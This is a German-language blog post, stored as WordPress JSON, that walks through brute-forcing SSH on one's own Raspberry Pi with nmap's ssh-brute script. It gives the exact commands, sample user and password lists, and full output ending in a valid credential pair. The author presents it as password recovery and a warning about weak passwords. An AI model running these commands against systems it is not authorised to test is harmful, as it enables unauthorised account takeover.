{"id":16896,"date":"2021-05-23T04:23:40","date_gmt":"2021-05-23T02:23:40","guid":{"rendered":"http:\/\/blog.wenzlaff.de\/?p=16896"},"modified":"2021-05-27T20:00:57","modified_gmt":"2021-05-27T18:00:57","slug":"ssh-passwort-zugriff-mit-brute-force-script-in-19-sekunden-oder-versuch-macht-klug","status":"publish","type":"post","link":"http:\/\/blog.wenzlaff.de\/?p=16896","title":{"rendered":"SSH Passwort Zugriff mit Brute-Force Script in 19 Sekunden oder &#8222;Versuch macht klug!&#8220;"},"content":{"rendered":"<p>Der Versuch macht klug und der Erfolg kommt schon mit dem Versuch und nicht erst wenn es klappt. Wer sein eigenes Passwort f\u00fcr den Raspberry Pi (oder auch jeden anderen Rechner) vergessen hat, kann es ja mal mit dem SSH <a href=\"https:\/\/nmap.org\/nsedoc\/scripts\/ssh-brute.html\" rel=\"noopener\" target=\"_blank\">Brute-Force<\/a> Script von nmap versuchen. Und es ist auch erschreckend, wie schnell und einfach man ein passwortgesch\u00fctzen Zugang hacken kann. Aber nur an eigenen Rechnern \ud83d\ude09<\/p>\n<p><a href=\"http:\/\/blog.wenzlaff.de\/wp-content\/uploads\/2021\/05\/Brute-force-scaled.jpg\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/blog.wenzlaff.de\/wp-content\/uploads\/2021\/05\/Brute-force-scaled.jpg\" alt=\"\" width=\"2560\" height=\"1919\" class=\"aligncenter size-full wp-image-16897\" srcset=\"http:\/\/blog.wenzlaff.de\/wp-content\/uploads\/2021\/05\/Brute-force-scaled.jpg 2560w, http:\/\/blog.wenzlaff.de\/wp-content\/uploads\/2021\/05\/Brute-force-300x225.jpg 300w, http:\/\/blog.wenzlaff.de\/wp-content\/uploads\/2021\/05\/Brute-force-1024x768.jpg 1024w, http:\/\/blog.wenzlaff.de\/wp-content\/uploads\/2021\/05\/Brute-force-768x576.jpg 768w, http:\/\/blog.wenzlaff.de\/wp-content\/uploads\/2021\/05\/Brute-force-1536x1151.jpg 1536w, http:\/\/blog.wenzlaff.de\/wp-content\/uploads\/2021\/05\/Brute-force-2048x1535.jpg 2048w\" sizes=\"auto, (max-width: 767px) 89vw, (max-width: 1000px) 54vw, (max-width: 1071px) 543px, 580px\" \/><\/a><\/p>\n<p>Wir habe hier mal, wie oben dargestellt zwei Raspberry Pi. Von dem <strong>pi<\/strong> oben links, machen wir mit der <a href=\"https:\/\/de.wikipedia.org\/wiki\/Brute-Force-Methode\" rel=\"noopener\" target=\"_blank\">Brute-Force-Methode<\/a> einen Scann des pi auf dem ein SSH Port Nr. 22 offen ist.<\/p>\n<p>Dazu benutzen wir nmap. Das k\u00f6nnen wir installieren mit <\/p>\n<p><strong>sudo apt-get install nmap<\/strong> oder wie <a href=\"http:\/\/blog.wenzlaff.de\/?p=16189\" rel=\"noopener\" target=\"_blank\">hier<\/a> beschrieben selbst compilieren.<\/p>\n<p>Nun checken wir, ob der SSH-Port Nr. 22 offen ist mit nmap: &#8230; <!--more--><\/p>\n<p><strong>nmap -p 22 &#8211;open ADRESSE-VOM-ZIEL-PI<\/strong><\/p>\n<pre class=\"lang:default decode:true \" >\r\n\r\nZ.b. Ergebnis:\r\nStarting Nmap 7.70 ( https:\/\/nmap.org ) at 2025-05-55 25:66 BST\r\nNmap scan report for pi-zero.fritz.box (x.x.x.x)\r\nHost is up (0.12s latency).\r\n\r\nPORT   STATE SERVICE\r\n22\/tcp open  ssh<\/pre>\n<p>Brute-Force bedeutet ja, das alle M\u00f6glichkeiten einfach durchprobiert werden. Dazu legen wir uns eine Datei mit Usern und eine mit m\u00f6glichen Passw\u00f6rtern an. Dann wird einfach alles durchprobiert.<\/p>\n<p>Wir erstellen also eine <strong>users.txt<\/strong> mit folgenden Usern:<\/p>\n<pre class=\"lang:default decode:true \" >\r\ntest\r\nuser\r\nadmin\r\nroot\r\nthomas\r\npi\r\nkleinhirn\r\n<\/pre>\n<p>und eine <strong>passwords.txt<\/strong> mit folgenden Passw\u00f6rtern:<\/p>\n<pre class=\"lang:default decode:true \" >\r\n123456\r\nroot\r\nadmin\r\npi\r\npasswort\r\nunsicher\r\n<\/pre>\n<p>So nun brauchen wir nur noch alles brute forcen mit diesen beiden Dateien und diesen einen Befehl:<\/p>\n<p><strong>nmap -p 22 &#8211;script <a href=\"https:\/\/nmap.org\/nsedoc\/scripts\/ssh-brute.html\" rel=\"noopener\" target=\"_blank\">ssh-brute<\/a> &#8211;script-args userdb=users.txt,passdb=passwords.txt ADRESSE-VOM-ZIEL-PI<\/strong> oder wenn nicht aus dem gleichen Verzeichnis gestartet:<\/p>\n<p><strong>nmap -p 22 &#8211;script ssh-brute &#8211;script-args userdb=\/home\/pi\/users.txt,passdb=\/home\/pi\/passwords.txt ADRESSE-VOM-ZIEL-PI<\/strong><\/p>\n<pre class=\"lang:default decode:true \" >\r\n\r\n\r\nnmap -p 22 --script ssh-brute --script-args userdb=users.txt,passdb=passwords.txt ADRESSE-VOM-ZIEL-PI\r\n\r\nErgebnis:\r\n\r\nStarting Nmap 7.70 ( https:\/\/nmap.org ) at 2021-05-22 10:48 BST\r\nNSE: [ssh-brute] Trying username\/password pair: test:test\r\nNSE: [ssh-brute] Trying username\/password pair: user:user\r\nNSE: [ssh-brute] Trying username\/password pair: admin:admin\r\nNSE: [ssh-brute] Trying username\/password pair: root:root\r\nNSE: [ssh-brute] Trying username\/password pair: thomas:thomas\r\nNSE: [ssh-brute] Trying username\/password pair: pi:pi\r\nNSE: [ssh-brute] Trying username\/password pair: kleinhirn:kleinhirn\r\nNSE: [ssh-brute] Trying username\/password pair: test:123456\r\nNSE: [ssh-brute] Trying username\/password pair: user:123456\r\nNSE: [ssh-brute] Trying username\/password pair: admin:123456\r\nNSE: [ssh-brute] Trying username\/password pair: root:123456\r\nNSE: [ssh-brute] Trying username\/password pair: thomas:123456\r\nNSE: [ssh-brute] Trying username\/password pair: pi:123456\r\nNSE: [ssh-brute] Trying username\/password pair: kleinhirn:123456\r\nNSE: [ssh-brute] Trying username\/password pair: test:root\r\nNSE: [ssh-brute] Trying username\/password pair: user:root\r\nNSE: [ssh-brute] Trying username\/password pair: admin:root\r\nNSE: [ssh-brute] Trying username\/password pair: thomas:root\r\nNSE: [ssh-brute] Trying username\/password pair: pi:root\r\nNSE: [ssh-brute] Trying username\/password pair: kleinhirn:root\r\nNSE: [ssh-brute] Trying username\/password pair: test:admin\r\nNSE: [ssh-brute] Trying username\/password pair: user:admin\r\nNSE: [ssh-brute] Trying username\/password pair: root:admin\r\nNSE: [ssh-brute] Trying username\/password pair: thomas:admin\r\nNSE: [ssh-brute] Trying username\/password pair: pi:admin\r\nNSE: [ssh-brute] Trying username\/password pair: kleinhirn:admin\r\nNSE: [ssh-brute] Trying username\/password pair: test:pi\r\nNSE: [ssh-brute] Trying username\/password pair: user:pi\r\nNSE: [ssh-brute] Trying username\/password pair: admin:pi\r\nNSE: [ssh-brute] Trying username\/password pair: root:pi\r\nNSE: [ssh-brute] Trying username\/password pair: thomas:pi\r\nNSE: [ssh-brute] Trying username\/password pair: kleinhirn:pi\r\nNSE: [ssh-brute] Trying username\/password pair: test:passwort\r\nNSE: [ssh-brute] Trying username\/password pair: user:passwort\r\nNSE: [ssh-brute] Trying username\/password pair: admin:passwort\r\nNSE: [ssh-brute] Trying username\/password pair: root:passwort\r\nNSE: [ssh-brute] Trying username\/password pair: thomas:passwort\r\nNSE: [ssh-brute] Trying username\/password pair: pi:passwort\r\nNSE: [ssh-brute] Trying username\/password pair: kleinhirn:passwort\r\nNSE: [ssh-brute] Trying username\/password pair: test:unsicher\r\nNSE: [ssh-brute] Trying username\/password pair: user:unsicher\r\nNSE: [ssh-brute] Trying username\/password pair: admin:unsicher\r\nNSE: [ssh-brute] Trying username\/password pair: root:unsicher\r\nNSE: [ssh-brute] Trying username\/password pair: thomas:unsicher\r\nNSE: [ssh-brute] Trying username\/password pair: pi:unsicher\r\nNSE: [ssh-brute] Trying username\/password pair: kleinhirn:unsicher\r\nNmap scan report for pi (x.x.x.x)\r\nHost is up (0.10s latency).\r\n\r\nPORT   STATE SERVICE\r\n22\/tcp open  ssh\r\n| ssh-brute:\r\n|   Accounts:\r\n|     kleinhirn:unsicher - Valid credentials\r\n|_  Statistics: Performed 46 guesses in 55 seconds, average tps: 0.6\r\n\r\nNmap done: 1 IP address (1 host up) scanned in 66.04 seconds<\/pre>\n<p>So das ging ja schnell, nur 66 Sekunden, und das mit einem Pi der nicht wirklich schnell ist und nmap Version 7.70. Und wenn das Passwort nicht als letztes in der Datei stehen w\u00fcrde, w\u00e4hre es ja auch noch viel schneller.<\/p>\n<p>Von einem <strong>iMacPro<\/strong> lief es mit der Version 7.91 sogar in <strong>19 Sekunden<\/strong>. Mit der 7.80 Version ist es auf dem iMacPro zu folgendem Fehler gekommen:<\/p>\n<pre class=\"lang:default decode:true \" >Assertion failed: (res &gt; 7), function nsock_library_initialize, file nsock_pool.c, line 307.\r\n[1]    58692 abort      nmap 10.0.7.25 -p 22 --script ssh-brute --script-args <\/pre>\n<p>Wer das alles \u00fcber eine Gui ausprobieren will, kann ja Zenmap verwenden, geht aber auch so:<\/p>\n<p><a href=\"http:\/\/blog.wenzlaff.de\/wp-content\/uploads\/2021\/05\/wenzlaff.de-2021-05-22-um-16.51.43.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/blog.wenzlaff.de\/wp-content\/uploads\/2021\/05\/wenzlaff.de-2021-05-22-um-16.51.43.png\" alt=\"\" width=\"2862\" height=\"1706\" class=\"aligncenter size-full wp-image-16908\" srcset=\"http:\/\/blog.wenzlaff.de\/wp-content\/uploads\/2021\/05\/wenzlaff.de-2021-05-22-um-16.51.43.png 2862w, http:\/\/blog.wenzlaff.de\/wp-content\/uploads\/2021\/05\/wenzlaff.de-2021-05-22-um-16.51.43-300x179.png 300w, http:\/\/blog.wenzlaff.de\/wp-content\/uploads\/2021\/05\/wenzlaff.de-2021-05-22-um-16.51.43-1024x610.png 1024w, http:\/\/blog.wenzlaff.de\/wp-content\/uploads\/2021\/05\/wenzlaff.de-2021-05-22-um-16.51.43-768x458.png 768w, http:\/\/blog.wenzlaff.de\/wp-content\/uploads\/2021\/05\/wenzlaff.de-2021-05-22-um-16.51.43-1536x916.png 1536w, http:\/\/blog.wenzlaff.de\/wp-content\/uploads\/2021\/05\/wenzlaff.de-2021-05-22-um-16.51.43-2048x1221.png 2048w\" sizes=\"auto, (max-width: 767px) 89vw, (max-width: 1000px) 54vw, (max-width: 1071px) 543px, 580px\" \/><\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Der Versuch macht klug und der Erfolg kommt schon mit dem Versuch und nicht erst wenn es klappt. Wer sein eigenes Passwort f\u00fcr den Raspberry Pi (oder auch jeden anderen Rechner) vergessen hat, kann es ja mal mit dem SSH Brute-Force Script von nmap versuchen. Und es ist auch erschreckend, wie schnell und einfach man &hellip; <\/p>\n<p class=\"link-more\"><a href=\"http:\/\/blog.wenzlaff.de\/?p=16896\" class=\"more-link\"><span class=\"screen-reader-text\">\u201eSSH Passwort Zugriff mit Brute-Force Script in 19 Sekunden oder &#8222;Versuch macht klug!&#8220;\u201c <\/span>weiterlesen<\/a><\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[220,4606,229,254,1023,1319,7],"tags":[2134,4887,4888,4889,4890,4891,4892,4893,4894,4895,4896,4897,4898,4899,1749,2740,811,380,740,4886,4885,3349],"class_list":["post-16896","post","type-post","status-publish","format-standard","hentry","category-anleitung","category-crypto","category-imac-2","category-os-x-2","category-raspberry-pi","category-sicherheit-2","category-tools","tag-brute-force","tag-brute-credfile","tag-brute-delay","tag-brute-emptypass","tag-brute-firstonly","tag-brute-guesses","tag-brute-mode","tag-brute-passonly","tag-brute-retries","tag-brute-start","tag-brute-threads","tag-brute-unique","tag-brute-useraspass","tag-erstellt-blockzeit-684551","tag-hack","tag-hacken","tag-nmap","tag-passwort","tag-ssh","tag-ssh-brute","tag-versuch","tag-zenmap"],"_links":{"self":[{"href":"http:\/\/blog.wenzlaff.de\/index.php?rest_route=\/wp\/v2\/posts\/16896","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/blog.wenzlaff.de\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/blog.wenzlaff.de\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/blog.wenzlaff.de\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"http:\/\/blog.wenzlaff.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=16896"}],"version-history":[{"count":0,"href":"http:\/\/blog.wenzlaff.de\/index.php?rest_route=\/wp\/v2\/posts\/16896\/revisions"}],"wp:attachment":[{"href":"http:\/\/blog.wenzlaff.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=16896"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/blog.wenzlaff.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=16896"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/blog.wenzlaff.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=16896"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}